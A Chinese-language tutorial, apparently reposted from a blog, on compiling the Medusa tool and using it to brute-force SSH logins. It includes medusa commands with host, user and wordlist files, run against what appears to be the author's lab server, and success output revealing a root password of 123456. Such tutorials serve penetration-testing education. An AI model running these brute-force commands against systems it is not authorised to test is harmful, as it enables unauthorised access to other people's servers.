使用Medusa美杜莎暴力破解SSH密碼


使用Medusa美杜莎暴力破解SSH密碼


 

 

 

1、Medusa簡介

Medusa(美杜莎)是一個速度快,支持大規模並行,模塊化的爆力破解工具。可以同時對多個主機,用戶或密碼執行強力測試。Medusa和hydra一樣,同樣屬於在線密碼破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表單的密碼爆破工具。

官方網站:http://foofus.net/goons/jmk/medusa/medusa.html。

 

2、安裝medusa ,手動編譯和安裝medusa

[root@k5 ~]# yum install libssh2-devel libssh2-devel  -y

[root@k5 ~]# tar zxvf 2.2.tar.gz

[root@k5 ~]# cd medusa-2.2/

[root@k5 medusa-2.2]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes

#這個參數中加入很多模塊,這樣方便后期使用。--enable-module-ssh=yes這個就是稍后要使用的暴力破解sshd服務的模塊。

[root@k5 medusa-2.2]#make -j 4

[root@k5 medusa-2.2]# make install         #安裝完成后,會將medusa的一些modules 文件復制到/usr/local/lib/medusa/modules文件夾。

[root@k5 ~]# ls /usr/local/lib/medusa/modules  #查看已經生成的模塊

 

3、Medusa參數說明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]

-h [TEXT]      目標主機名稱或者IP地址

-H [FILE]       包含目標主機名稱或者IP地址文件

-u [TEXT]      測試的用戶名

-U [FILE]       包含測試的用戶名文件

-p [TEXT]      測試的密碼

-P [FILE]       包含測試的密碼文件

-C [FILE]       組合條目文件

-O [FILE]       日志信息文件

-e [n/s/ns]    n代表空密碼,s代表為密碼與用戶名相同

-M [TEXT]      模塊執行名稱

-m [TEXT]      傳遞參數到模塊

-d                 顯示所有的模塊名稱

-n [NUM]       使用非默認Tcp端口

-s                 啟用SSL

-r [NUM]       重試間隔時間,默認為3秒

-t [NUM]       設定線程數量

-T             同時測試的主機總數

-L                 並行化,每個用戶使用一個線程

-f                 在任何主機上找到第一個賬號/密碼后,停止破解

-F                在任何主機上找到第一個有效的用戶名/密碼后停止審計。

-q                顯示模塊的使用信息

-v [NUM]      詳細級別(0-6)

-w [NUM]     錯誤調試級別(0-10)

-V                顯示版本

-Z [TEXT]      繼續掃描上一次

 

4、破解單一服務器SSH密碼

例1:通過文件來指定host和user,host.txt為目標主機名稱或者IP地址,user.txt指定需要暴力破解的用戶名,密碼指定為123456。

[root@k5 medusa-2.2]# cd

[root@k5 ~]# echo 10.27.17.34 > /root/host.txt

[root@k5 ~]# echo root > /root/users.txt

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -p 123456

 

注:可以看到暴解成功。

 

例2:對單一服務器進行密碼字典暴力破解

[root@k5 ~]# vim /root/p.txt       #寫入以下內容,每行一個密碼,做一個臨時字典 。

123

abc123

123456

666666

注:其中123456 是我們的密碼

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt

 

例3:加-O  ssh.log 可以將成功破解的記錄記錄到ssh.log文件中

[root@k5 medusa-2.2]# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log

ACCOUNT CHECK: [ssh] Host: 10.27.17.34 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (2 of 861 complete)
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]

[root@k5 ~]# cat ssh.log

# Medusa has finished (2019-09-19 11:13:37).
# Medusa v.2.2 (2019-09-19 11:15:16)
# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log 
# Medusa v.2.2 (2019-09-19 11:26:37)
# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log 
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]
# Medusa has finished (2019-09-19 11:26:40).


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM